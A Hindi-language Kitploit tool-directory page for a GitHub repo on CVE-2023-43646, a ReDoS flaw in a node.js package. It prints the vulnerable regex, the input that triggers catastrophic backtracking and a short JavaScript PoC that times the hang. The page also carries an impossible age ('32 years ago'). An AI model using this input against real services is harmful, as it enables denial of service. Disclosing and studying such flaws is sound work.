Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2023-43646 — redos | Kitploit
उपकरण/GitHubGitHub/200101whoami/cve-2023-43646
भेद्यता स्कैनरभेद्यता विश्लेषणकोड विश्लेषणपेपर और शोधलर्निंग और शिक्षा
GitHub200101whoami/cve-2023-43646

CVE-2023-43646

redos

रिपॉजिटरी देखें
32 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2023-43646

भेद्यता अवलोकन

  • CVE-2023-43646

  • CVSS: 8.6

  • 26 सितंबर, 2023

  • node.js पैकेज में ReDoS

  • rebob प्रोजेक्ट का हिस्सा

भेद्यता विवरण

github सलाहकार

root@kitploit:~
/\sfunction(?:\s|\s/[^(?:*\/)]+/\s*)*([^\(\/]+)/

यह भेद्यता तब शोषित की जा सकती है जब कोष्ठकों में असंतुलन होता है, जिसके परिणामस्वरूप अत्यधिक बैकट्रैकिंग होती है और इसके बाद CPU लोड और प्रसंस्करण समय में महत्वपूर्ण वृद्धि होती है। इस भेद्यता को निम्नलिखित इनपुट का उपयोग करके ट्रिगर किया जा सकता है:

root@kitploit:~
'\t'.repeat(54773) + '\t/function/i'

यहाँ समस्या को प्रदर्शित करने के लिए एक सरल PoC कोड है:

root@kitploit:~
const protocolre = /\sfunction(?:\s|\s/[^(?:*\/)]+/\s*)*([^\(\/]+)/;

const startTime = Date.now();
const maliciousInput = '\t'.repeat(54773) + '\t/function/i'

protocolre.test(maliciousInput);

const endTime = Date.now();

console.log("process time: ", endTime - startTime, "ms");

लक्ष्य पैकेज

टूल डाउनलोड करें